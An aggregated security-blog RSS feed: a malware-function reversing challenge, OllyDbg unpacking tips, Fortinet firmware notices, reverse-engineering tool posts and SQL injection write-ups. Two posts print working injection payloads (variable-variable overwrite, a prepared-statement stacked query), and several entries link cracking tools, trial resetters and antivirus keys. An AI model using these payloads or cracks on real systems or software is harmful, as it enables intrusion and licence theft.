http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx While analyzing a malware sample today, I came across an interesting function. It uses red-herring local variables and red-herring global variables, and even once you get rid of that code, it's still unclear as to what the function does. Since you don't have access to the callers of this function, I'll tell you this: * The first argument is a null-terminated ASCII string. * The second argument is a null-terminated ASCII string. * The third argument is an integer. Your challenge? Tell me what the function does. Your prize? You get to choose the name of the next malware family that I name. Stipulations: * Cannot refer to the name of a person, place, or time. * Cannot refer to anything obscene or offensive. * Cannot be found in a dictionary or web-search. * Cannot use bleep-casing for compounding words -- must begin with one uppercase letter and end with all lowercase letters. * Must be a "generic" name (for example, shouldn't contain the word "bot" or "worm", since I have no idea what class of malware I'll end up naming next). * Must be humanly pronouncable. * Must be between four and eight letters in length. * I have final discretion over the name in case you think of something "bad" that isn't covered by one of the rules above. The winner is the first person to post a comment that correctly and fully describes in high-level English (not in code) what the function does. And to in case you think I'm "hiring cheap labor" to analyze this for me, I'll pull a Raymond Chen and say that the MD5 of my analysis is F2F3648B9BE371B4682B728A7A3D920F. Once the correct answer is posted, I'll post my analysis which hashes to that MD5. Here's the function: sub_0 proc near var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 10h push ebx push esi push edi mov esi, [ebp+ arg_4 ] mov [ebp+ var_8 ], 697A259Dh xor [ebp+ var_8 ], 182Ch inc dword ptr ds: 42C094h and [ebp+ var_C ], 0 and [ebp+ var_4 ], 0 jmp short loc_94 ; ----------------------------------------------------------------------- loc_2A: ; CODE XREF: sub_0+A6j xor ebx, ebx add [ebp+ var_8 ], 3AA5h inc dword ptr ds: 42C094h xor edi, edi jmp short loc_81 ; ----------------------------------------------------------------------- loc_3D: ; CODE XREF: sub_0+8Fj mov eax, [ebp+ var_4 ] add eax, edi mov edx, [ebp+ arg_0 ] movsx eax, byte ptr [edx+eax] movsx edx, byte ptr [esi+edi] cmp eax, edx jnz short loc_52 inc ebx loc_52: ; CODE XREF: sub_0+4Fj mov ecx, esi or eax, 0FFFFFFFFh loc_57: ; CODE XREF: sub_0+5Cj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_57 cmp ebx, eax jnz short loc_72 inc [ebp+ var_C ] mov eax, [ebp+ arg_8 ] cmp [ebp+ var_C ], eax jnz short loc_72 mov eax, [ebp+ var_4 ] jmp short loc_C0 ; ----------------------------------------------------------------------- loc_72: ; CODE XREF: sub_0+60j ; sub_0+6Bj mov eax, 43C9h mul [ebp+ var_8 ] mov [ebp+ var_10 ], eax mov [ebp+ var_8 ], eax inc edi loc_81: ; CODE XREF: sub_0+3Bj mov ecx, esi or eax, 0FFFFFFFFh loc_86: ; CODE XREF: sub_0+8Bj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_86 cmp edi, eax jb short loc_3D inc [ebp+ var_4 ] loc_94: ; CODE XREF: sub_0+28j mov eax, [ebp+ arg_0 ] mov ecx, eax or eax, 0FFFFFFFFh loc_9C: ; CODE XREF: sub_0+A1j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_9C cmp [ebp+ var_4 ], eax jb short loc_2A mov eax, 0FFFFh jmp short loc_C0 ; ----------------------------------------------------------------------- mov eax, 514Ah mul dword ptr [ebp- 8 ] mov [ebp- 10h ], eax mov eax, [ebp- 10h ] mov [ebp- 8 ], eax loc_C0: ; CODE XREF: sub_0+70j ; sub_0+ADj pop edi pop esi pop ebx leave retn sub_0 endp And here's the raw byte-code for the function above: 5589E583EC105356578B750CC745F89D257A698175F82C180000FF0594C04200 8365F4008365FC00EB6A31DB8145F8A53A0000FF0594C0420031FFEB448B45FC 01F88B55080FBE04020FBE143E39D075014389F183C8FF40803C010075F939C3 7510FF45F48B45103945F475058B45FCEB4EB8C9430000F765F88945F08945F8 4789F183C8FF40803C010075F939C772ACFF45FC8B450889C183C8FF40803C01 0075F93945FC7282B8FFFF0000EB11B84A510000F765F88945F08B45F08945F8 5F5E5BC9C3

==> Virus Bulletin 2006

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I bought my plane ticket a few hours ago for Virus Bulletin 2006. I'm looking forward to rubbing elbows with other virus analysts and discussing the latest and greatest reverse engineering tools and methods. If you're going to VB'06 as well, send me an e-mail or find me in person and mention my blog and I'll buy you a beer (which shouldn't be too hard seeing as how the conference will be in Montreal)!

==> Unpacking DLLs and Drivers with OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx People often ask me how to unpack DLLs and drivers. A common assumption is that it is necessary to use OllyDbg's LOADDLL for unpacking DLLs and that a ring-0 debugger such as SoftICE or WinDbg is necessary for unpacking drivers. With a little tweaking, we can use regular OllyDbg to unpack packed DLLs and even many packed drivers. I don't know about you, but I've always had problems with LOADDLL. Even though it's well documented in OllyDbg's help file (the source is even included in the help file), I'd rather not use it if I don't have to. So how can we load a DLL into OllyDbg so that we can unpack it like we would a normal EXE? All that you need to do is set the IMAGE_FILE_DLL bit to zero in the Characteristics field of the PE's IMAGE_FILE_HEADER structure. You could use a hex editor to make this change, but it's easier with a PE editor like LordPE. Once this flag is zeroed out, you can load the "DLL" into OllyDbg and OllyDbg and the OS will interpret it as an EXE. You can then unpack it as you would an EXE (trace to the OEP, dump, fix the imports, etc.), and then set the IMAGE_FILE_DLL bit back to one in the unpacked file. The only catch is that many unpacking stubs check to see if [EBP+0x0C] == 1 (does the fdwReason argument to DllMain equal DLL_PROCESS_ATTACH), and if it doesn't equal 1 then it won't continue to unpack itself. You can fix this problem by looking for this comparison and forcing a jump/no-jump or by manually pushing three DWORDs onto the stack (before executing the first instruction at the EP), the second of which should be 1. We can use the same PE header patching trick for loading drivers into OllyDbg for unpacking purposes. By setting the Subsystem field to 2 (IMAGE_SUBSYSTEM_WINDOWS_GUI) in the PE's IMAGE_OPTIONAL_HEADER, OllyDbg and the OS will interpret the file as an EXE instead of as a driver. This allows us to trace through the unpacking stub until the code and data are unpacked, and we can dump the process when we find the OEP. Of course if the unpacking stub is trying to execute instructions/functions that need to be executed from ring-0 then we won't be able to unpack it like this. However, if the unpacking stub is just doing a lot of simple XORing to unpack the original code and data, then we should be able to use this trick to successfully unpack the driver with OllyDbg.

==> FortiVoice 7.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.2.0 B005 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> FortiAnalyzer 4.3.6

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 4.3.6 B0691 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FLG_100B, FLG_100C, FLG_400B, * FLG_800, FLG_800B, FLG_1000B, * FLG_1000C, FLG_2000, FLG_2000A, * FLG_2000B, FLG_4000, FLG_4000A, * FLG_4000B, FLG_VM32, FLG_400C, * FLG_VM64, FLG_200D

==> FortiCam 1.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiCam 1.0.0 B0116 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FCM_200D, FCM_VM-64

==> FortiCache 2.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiCache 2.2.0 B0221 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FCH1KC, FCH3KC, FCH4HC,

==> FortiAnalyzer 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 5.0.1 B0087 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAZ_1000B, FAZ_1000C, FAZ_100C, * FAZ_2000A, FAZ_2000B, FAZ_4000A, * FAZ_4000B, FAZ_400B, FAZ_400C, * FAZ_VM32, FAZ_VM64, FAZ_200D,

==> FortiOS 4.3.11

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.3.11 B0646 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_800, FGT_3600, FGT_300A, * FGT_100A, FGT_200A, FGT_400A, * FGT_500A, FGT_800F, FGT_5001FA2, * FGT_1000A, FGT_5001, FGT_5005, * FGT_3810A, FGT_50B, FWF_50B, * FGT_3016B, FGT_310B, FGT_30B, * FGT_5005FA2, FGT_224B, FWF_60B, * FGT_60B, FGT_1000AFA2, FGT_1000A_LENC, * FGT_3600A, FGT_5002FB2, FGT_5001A, * FGT_620B, FOC_5001, FOC_5005FA2, * FOC_3810A, FGT_110C, FOC_WF_60B, * FGT_111C, FGT_51B, FGT_80C, * FWF_80CM, FGT_311B, FWF_30B, * FGT_82C, FWF_81CM, FGT_ONE, * FGT_1240B, FGT_3950B, FGT_3951B, * FOC_60B, FOC_5001A, FOC_5001FA2, * FGT_80CM, FGT_200B, FGT_200B_POE, * FGT_310B_DC, FGT_620B_DC, FWF_60C, * FOC_3950B, FOC_3951B, FGT_3040B, * FGT_621B, FGT_3140B, FGT_5001B, * FGT_60C, FGT_VM32, FK_3810A, * FK_5001A, FK_3950B, FK_3951B, * FSW_5203B, FWF_60CX_A, FWF_60CM, * FGT_300C, FOC_80C, FOC_5001B, * FK_5001B, FGT_VM64, FGT_600C, * FGT_1000C, FGT_40C, FWF_40C, * FGT_20C, FWF_20C, FGT_VM64_XEN, * FGT_100D, FGT_5101C, FGT_3140B_LENC, * FGT_3140B_DC, FGT_3040B_LENC, FGT_3040B_DC, * FGT_800C, FGT_60C_POE, FGT_20C_ADSL_A, * FWF_20C_ADSL_A

==> FortiManager 4.3.6

http://pub.kb.fortinet.com/rss/firmware.xml FortiManager 4.3.6 B0673 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FMG_200D

==> FortiWeb 4.4.4

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.4 B0669 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_4000C, FWB_VM-64bit

==> FortiClient Mac 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Mac 5.0.0 B0068 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MacOS

==> FortiClient 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 5.0.0 B0161 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Windows_x64, Windows_x86

==> FortiAnalyzer 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 5.0.0 B0076 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAZ_1000B, FAZ_1000C, FAZ_100C, * FAZ_2000A, FAZ_2000B, FAZ_4000A, * FAZ_4000B, FAZ_400B, FAZ_400C, * FAZ_VM32, FAZ_VM64, FAZ_200D,

==> FortiOS 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 5.0.0 B0128 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_40C, FGT_60C, FGT_80C, * FGT_80CM, FGT_110C, FGT_111C, * FGT_200B, FGT_200B_POE, FGT_300C, * FGT_310B, FGT_311B, FGT_620B, * FGT_620B_DC, FGT_621B, FGT_1240B, * FGT_3016B, FGT_3040B, FGT_3140B, * FGT_3810A, FGT_3950B, FGT_3951B, * FGT_5001A, FGT_5001B, FGT_VM32, * FGT_VM64, FWF_40C, FWF_60C, * FWF_60CM, FWF_60CX_A, FWF_80CM, * FWF_81CM, FGT_310B_DC, FGT_3040B_DC, * FGT_3040B_LENC, FGT_3140B_LENC, FGT_3140B_DC, * FGT_800C, FGT_1000C, FGT_100D, * FGT_5101C, FGT_600C, FSW_5203B, * FWF_20C, FGT_20C, FGT_60C_POE, * FGT_20C_ADSL_A, FWF_20C_ADSL_A

==> FortiManager 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiManager 5.0.0 B0076 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FortiConsole, FMG_1000C, FMG_100C, * FMG_3000B, FMG_3000C, FMG_400B, * FMG_400C, FMG_5001A, FMG_VM32, * FMG_VM64, FMG_200D

==> FortiAP 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiAP 5.0.0 B0021 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAP_210B, FAP_220B, FAP_221B, * FAP_222B, FAP_112B, FAP_320B, * FAP_223B

==> FortiExploreriOS 1.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiExploreriOS 1.0.0 B0109 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * iOS

==> FortiDB 4.4.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiDB 4.4.2 B0240 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FDB_400B, FDB_1000B, FDB_1000C, * FDB_2000B, FDB_Stand-alone, FDB_400C,

==> FortiCache 2.1.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiCache 2.1.3 B0176 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FCH1KC, FCH3KC, FCH4HC,

==> FortiAuthenticator 2.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiAuthenticator 2.0.0 B0006 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAC_400C, FAC_1000C, FAC_3000B, * FAC_VM

==> FortiDDoS 3.1.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiDDoS 3.1.2 B4 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FDD_100A, FDD_200A, FDD_300A,

==> FortiVoice 7.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.2.0 B004 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> FortiClient 4.3.5

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 4.3.5 B472 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Windows_x86, Windows_x64

==> FortiMail 4.3.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiMail 4.3.3 B0520 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FE_100, FE_100C, FE_400, * FE_400B, FE_400C, FE_2000, * FE_2000A, FE_2000B, FE_3000C, * FE_3000C_LENC, FE_4000, FE_5001A, * FE_5002B, FE_VM, FE_200D,

==> FortiWeb 4.4.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.3 B0657 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_4000C, FWB_VM-64bit

==> FortiClient Android 4.1.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Android 4.1.1 B0019 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Android

==> Has HTML5 made us more secure?

http://rdist.root.org/feed/ Brad Hill recently wrote an article claiming that HTML5 has made us more secure, not less. His essential claim is that over the last 10 years, browsers have become more secure. He compares IE6, ActiveX, and Flash in 2002 (when he started in infosec) with HTML5 in order to make this point. While I think [...]

==> Toggl time-tracking service failures

http://rdist.root.org/feed/ A while ago, we investigated using various time-tracking services. Making this quick and easy for employees is helpful in a consulting company. Our experience with one service should serve as a cautionary note for web 2.0 companies that want to sell to businesses. Time tracking is a service that seems both boring and easy to [...]

==> Cyber-weapon authors catch up on blog reading

http://rdist.root.org/feed/ One of the more popular posts on this blog was the one pointing out how Stuxnet was unsophisticated. Its use of traditional malware methods and lack of protection for the payload indicated that the authors were either “Team B” or in a big hurry. The post was intended to counteract the breathless praise in the [...]

==> RSA repeats earlier claims, but louder

http://rdist.root.org/feed/ Sam Curry of RSA was nice enough to respond to my post. Here’s a few points that jumped out at me from what he wrote: RSA is in the process of fixing the downgrade attack that allows an attacker to choose PKCS #1 v1.5, even if the key was generated by a user who selected [...]

==> Why RSA is misleading about SecurID vulnerability

http://rdist.root.org/feed/ There’s an extensive rebuttal RSA wrote in response to a paper showing that their SecurID 800 token has a crypto vulnerability. It’s interesting how RSA’s response walks around the research without directly addressing it. A perfectly accurate (but inflammatory) headline could also have been “RSA’s RSA Implementation Contained Security Flaw Known Since 1998“. The research [...]

==> SSL optimization and security talk

http://rdist.root.org/feed/ I gave a talk at Cal Poly on recently proposed changes to SSL. I covered False Start and Snap Start, both designed by Google engineer Adam Langley. Snap Start has been withdrawn, but there are some interesting design tradeoffs in these proposals that merit attention. False Start provides a minor improvement over stock SSL, which [...]

==> OllyDbg 2.00.01 (Final)

http://reversengineering.wordpress.com/feed/ OllyDbg 2.0 is a 32-bit assembler-level analyzing Degugger with intuitive interface. It is especially useful if source code is not available or when you experience problems with your compiler. Requirements. Developed and tested mainly under Windows 2000 and Windows XP, but should work under any Windows version: 95, 98, ME, NT, 2000, XP, 2003 Server, [...]

==> PROTECTiON iD 6.4.0

http://reversengineering.wordpress.com/feed/ Features: - detection of every major PC ISO Game / Application protection - currently covers 475 detections, including win32/64 exe protectors & packers, .net protectors, dongles, licenses & installers - sector scanning CDs / DVDs for Copy Protections - files / folders can simply be drag & droped into pid - strong scanning routines allowing [...]

==> StrongOD 0.3.4.639

http://reversengineering.wordpress.com/feed/ Make your OllyDbg Strong! This plug-in provides three kinds of ways to initiate the process: 1, Normal – And the same manner as the original start, the STARTUPINFO inside unclean data 2, CreateAsUser – User with a mandate to initiate the process of the user, so that the process running under the purview of the [...]

==> Broken links ! لینکهایی که کار نمی کند

http://reversengineering.wordpress.com/feed/ hi dear friends tell me about broken links in this post i will find it on my system and after that i will try [...]

==> Trial Reset 4 Final

http://reversengineering.wordpress.com/feed/ Trial Reset 4 Final Tnx fly to his programmer http://rapidshare.com/files/409095074/Trial-Reset40Final.zip http://reversengineering.files.wordpress.com/2010/07/trial-reset40final-zip.jpg you know what to do;) Filed under: OTHER, TOOLS

==> The newest NOD32 keys with MVGM NOD32 Licence v1.0

http://reversengineering.wordpress.com/feed/ HI The newest NOD32 keys with MVGM NOD32 Licence v1.0 NOD32 [...]

==> TrialReset 4.0 Final (Public)

http://reversengineering.wordpress.com/feed/ hi to all i am here again thank u for ur supporting The small program for remove trial of apps. Works with all the widespread systems of protection. The interface is very simple: [...]

==> ODDragAttach 1.1

http://reversengineering.wordpress.com/feed/ Author Exile Description Choice is, it will add the window corresponding to the process of src and bin. Window, the process of selection, OD automatically minimize the window, select the target window, then maximize the window, OD. Note: Some versions of the OD program may cover an open button, can be changed according [...]

==> Attach Extended 0.1

http://reversengineering.wordpress.com/feed/ This is a really small plugin that I have written for improving attach feature of OllyDbg. With this plugin, you can attach to process by identifying its PID directly, not only selecting process list. In addition, you can find PID of process by dragging a small cursor on each window (This can be used on [...]

==> Mapimp 0.4

http://reversengineering.wordpress.com/feed/ Author takerZ Description This is an open source OllyDbg plugin which will help you to import map files exported by IDA or Dede. There are many plugins using which you can perform similar actions, but mapimp: - Recognizes debugged file segments and applies names correctly - Has an option to overwrite or skip [...]

==> Obsidium 1.4.x.x OEP Finder + IAT Repair v0.1

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/7203.a79ca10d2342f1b32333add72/Obsidium_1.4.x.x_OEP_Finder___IAT_Repair_v0.1.txt.html Author Pavka Posted in Scripts, TOOLS

==> MUltimate Assembler 1.2

http://reversengineering.wordpress.com/feed/ Author RaMMicHaeL A multi-line (dis)assembler tool, perfect for writing code caves. It supports: - labels and data (C-style string) - external jumps and calls. http://letitbit.net/download/6671.c63ed09074b57c49b4cd2067e/MUltimate_Assembler_v1.2.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> VMProtect 1.7 – 1.8 OEP Finder + Unpack Helper v1.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/2516.25addf1167522eb8602b67146/VMProtect_1.7___1.8_OEP_Finder___Unpack_Helper_v1.0.txt.html by LCF-AT Posted in Scripts, TOOLS

==> CodeDoctor 0.90

http://reversengineering.wordpress.com/feed/ Functions: 1) Deobfuscate Select instructions in disasm window and execute this command. It will try to clear the code from junk instructions. Example: Original: 00874372 57 PUSH EDI 00874373 BF 352AAF6A MOV EDI,6AAF2A35 00874378 81E7 0D152A41 AND EDI,412A150D 0087437E 81F7 01002A40 XOR EDI,402A0001 00874384 01FB ADD EBX,EDI 00874386 5F POP EDI Deobfuscated: 00874372 83C3 04 [...]

==> Themida + WinLicense 1.1.0.0 – 2.1.0.0 Dumper + IAT Repair + CodeEncrypt Repair v2.6.0

http://reversengineering.wordpress.com/feed/ by Quosego http://letitbit.net/download/5120.c5ff8c01bf87b5594de7f4fbc/Themida___WinLicense_1.1.0.0___2.1.0.0_Dumper___IAT_Repair___CodeEncrypt_Repair_v2.6.0.txt.html Posted in Scripts, TOOLS

==> Scripad 1.0 + ODBGScript 1.77.3

http://reversengineering.wordpress.com/feed/ ODbgScript is a plugin for OllyDbg, which is, in our opinion, the best application-mode debugger out there. One of the best features of this debugger is the plugin architecture which allows users to extend its functionality. ODbgScript is a plugin meant to let you automate OllyDbg by writing scripts in an assembly-like language. Many tasks [...]

==> StrongOD 0.2.6.415

http://reversengineering.wordpress.com/feed/ This will be a seperate download of StrongOD as of version 0.2.4.350 because – as strange as it sounds – the developer has protected it! This plugin will now require a key for it to run and be used. You can obtain a valid key by emailing: StrongODsafengine.com http://letitbit.net/download/9563.9f5459d00eca80b4993740279/StrongOD_v0.2.6.415.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> PDF Protection Remover 3.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/8140.813d385e39b7bcbb34ccc58af/PDF_Protection_Remover_3.0___Patch_DJiNN.rar.html pass :www.2baksa.net Posted in TOOLS, Uncategorized

==> HOlly 0.2 Build 81

http://reversengineering.wordpress.com/feed/ This is my OllyDbg mod named HOlly. I will be constantly adding features as I require them or they are requested. Currently it only has a multiline assembler that needs some work but I would like some input. So if I could get some input on the following that would be great. http://letitbit.net/download/3997.d3730400452d29f3a615da1f7/HOlly_v0.2_Build_81.rar.html Posted in [...]

==> Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0

http://reversengineering.wordpress.com/feed/ Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0 By [SND]quosego Hi all, It’s time to make a final stand. Oreans it’s your turn now. This package includes the following; WL.&.TM.VM.dumper.&.IAT.CodeEnc.Fixer.v2.6.0-SnD A script to unpack all known versions of Winlicense and Themida using any options. The script will unpack all known Themida and Winlicense applications using virtual machine antidump on Windows XP. [...]

==> PHP, variable variables, oh my!

http://rgaucher.info/feed/rss2 I was just looking at some PHP code for one of our clients, and found a case I haven't seen many times before. I thought I should share it here. The code I was looking at looks like this: <?php // Init the PHP array with some SQL code to start the query $declareSQLArray = InitializedArray('stuff'); // Use a strong enough validation routine for do the input // validation of POST variables while(list($name, $value) = each($_POST)) { if(!is_array($value)) $$name = StrongValidation($value); else $$name = $value; } // Do something with my variables and always do a proper // validation when I use the data // Eventually, build my SQL command, and send this to the DB $sql_command = join(' ', $declareSQLArray); mysql_query($sql_command); ?> The code, even if horribly constructed, does not seem to show important weaknesses, but the usual case of submitting a POST variable as an array, and bypassing the StrongValidation. Then, in that case, it would have failed every other validation routines in the code. Even if experienced with PHP, you might not have encountered variable variables before. In short, this allows to dynamically declare named variables. Here is a simple example: hubert:~ Romain$ php -r '$name="foo"; $$name="Hello World!\n"; echo $foo;' Hello World! Here, the variable $foo gets declared, and assigned using PHP's variable variables capabilities. Getting back to our code example, I'm sure the reader will spot the issue, and what an attacker can do to exploit such scenario to trigger, in that case, a SQL injection. Since the variable $declareSQLArray is defined and initialized before the POST variables lookup, it is possible to reassign it using the variable variables. In that case, no validation is performed when we submit an array, and this is exactly what we want to do! To exploit the SQL injection, you only need to submit POST variables to overwrite the $declareSQLArray, and add the content that we want in it! POST /code_example.php HTTP/1.1 Host: example.com ... declareSQLArray%5B%5D=SELECT...;&declareSQLArray%5B%5D=--&whatever... Job done! The resulting SQL query will start with the payload that was submitted as part of $declareSQLArray. You've got your SQL injection. Update: While driving back home, I was wondering if I could overwrite values from the SESSION using this technique. A couple of lines of code, and POST request after the answer is short: YES. Imagine that you have an isadmin variable as part of the session (which is an associative array). This variable would be set in a code like this: if ($user->isNotAdmin()) $_SESSION['isadmin'] = 0; else $_SESSION['isadmin'] = 1; Exploiting the previous weakness of the code example, we are able to overwrite the $_SESSION['isadmin'] content, only by supplying what will be interpreted as an associative array by PHP: POST /code_example.php HTTP/1.1 Host: example.com ... _SESSION%5Bisadmin%5D=1&whatever... I'm sure you're thinking, as I do, that this is getting more interesting! Anyways, this issue is not new at all, it is known as Dynamic Variable Evaluation (thanks to Steve Christey). The interesting part of it is that DAST won't be able to detect it (or maybe if you are lucky enough), and it is very hard for a SAST to deal with it (actually, I doubt any SAST vendor who supports PHP handles this case, but it's not impossible since they have all they need to solve the problem). Update 2: Based on the comments, I did some testing and observed that even if we can overwrite data from the session, this data does not get persisted in the session. This means that you can still control a value from a super global for the remaining execution of the script, but cannot persist the data.

==> Dissection of a SQL injection challenge

http://rgaucher.info/feed/rss2 As part of the SQL injection challenges that I developed (focusing on MySQL), one of the classic challenges (we have the same types for XSS), is a simple, yet disturbing for juniors, black-list and few controls such as partial output encoding. In the case of SQLi, I decided to blacklist the following keywords (as seen during an assessment): select, union, drop, delete, insert, and, or, where, update, if, not On top of this, I use the mysqli function that properly escapes strings (mysqli_real_escape_string), and I remove all white-spaces. The SQL commands is using a multiple queries aware driver (i.e., you can stack queries), and the injection context is fairly simple and we have something like this: SELECT username FROM users WHERE userid=<<HERE>> Since this is an * exploitation* challenge, the goal is to extract the password of a given user from this database. Now, every time that I write a challenge, I first come up with the application and I need to break it after to make sure that there is a solution (unless the challenge is derived from what I found already in some of my previous assessments). Anyway, here my main personal challenge was to come up with a query that would retrieve the proper data without using one of the black-listed keywords. Spaces and quotes are easy not to care about simply by using /**/ as a word separator, and we can use the hexadecimal representation of strings so that we make sure not to use single-quotes & co. Here is a quick summary with 2 similar queries: * Spaces bypass: select//foobar//FROM//table//WHERE/**/user='c3'; * Single quotes: select foobar FROM table WHERE user=0x6333; The way I found to solve this challenge is to use MySQL prepared statements. However, I was fairly disturbed at first since I cannot use the following syntax in MySQL: PREPARE st FROM 0x73656c656374202a2066726f6d207573657273; EXECUTE st; DEALLOCATE PREPARE st; where 0x73656c656374202a2066726f6d207573657273 contains the query to get everything from the users' table (i.e., select * from users). The syntax of the PREPARE keyword is not flexible like any other string manipulation in MySQL, and does not allow strings with their hexadecimal representation. The gotcha here (I wouldn't call this a trick) is to use a temporary variable assignment, and use this variable in the PREPARE construct. The final construct I used is the following: SET @v=0x73656c656374202a2066726f6d207573657273; PREPARE st FROM @v; EXECUTE st; DEALLOCATE PREPARE st; Now, putting the pieces together, and adding this into the our original query, we get a payload similar like this: 9999||username=0xdeadbeef;SET//@s=0x73656c656374202a2066726f6d207573657273;PREPARE//ss//FROM//@s;EXECUTE//ss;DEALLOCATE//PREPARE/**/ss;# This construct is very similar to the solution of the challenge, but not exactly the same since we need to use the application to display the data. Therefore, in that case we need to make sure that the prepared statement will return only one column, etc. Anyway, I wanted to share this since I haven't come across many references that talked about using prepared statements as SQL injection payloads...

==> WASC Threat Classification 2 - Wordle

http://rgaucher.info/feed/rss2 I just dig that image out; I made it for the release of the WASC Threat Classification 2.0

==> Yes, we need a standard to evaluate SAST, but it ain't easy...

http://rgaucher.info/feed/rss2 In reply to Dinis's blog post: The Need for Standards to evaluate Static Analysis Tools 1. You unfortunately list few types of SAST. Many of tools don't implement taint analysis -- if you go in the Ada/C/C++ world, you won't see much of taint based analysis, but other technologies such as symbolic execution (Grammatech), abstract interpretation (ASTREE, PolySpace, etc.), and more. A list of SAST can be found on the NIST SAMATE website: List of Source Code Security Analyzers 2. As said on twitter, concerning the WASSEC, I don't believe it's important to have public evaluation of commercial/open-source tools. Also, WASSEC lists some vulnerabilities that the tool should look for, we don't provide test cases so it's not nearly possible to claim that a tool effectively test for a given problem, e.g. difference between two tools: * Only test XSS with few payloads and does regexp matching of the rendered html * A smarter engine that automagically crafts attacks and look at the resulting html with a JS engine (or so, that leads to fewer FP). Depending on who you are and what you want, you might very well say that those two tools have the same support for XSS... Moreover, tools are changing so quickly that an evaluation would only be accurate at the time you make it. 3. NIST SATE is literally an exposition. NIST choose test cases (real open-source program that covers different type of functionalities and technologies) and ask tool makers to run their SAST on those programs. The goal isn't to compare the tool to claim that one is better than the other for a type of techno, but it's too see how tools (in general) performs, to see how many types of weaknesses the tools find and also what is the overlap of tool findings (which resulted in a very little amount of findings). More generally, as Andrew said, a SAST isn't only an analysis engine that finds weaknesses in a program; it's a suite of functionalities: * support technologies * allows users to develop custom checks (or custom rules) * displays the weaknesses to the user (allow to rank/prune and explain problem) and reporting capabilities Ultimately, every one of those elements are important and need to be tested, but again, the importance of those depend on who you are and how you want to use the SAST (from simple compliance type of scan to exhaustive security testing). Just to tell you, NIST SAMATE (organizers of SATE) have been thinking a lot of those problem and there is no easy solution for evaluating SAST... But the last SATE report explains some of the problems we (I was part of the SAMATE team at the time) faced: SATE 2008 - NIST Special Publication 500-279

==> Data driven factory: I give you data, you give me an object...

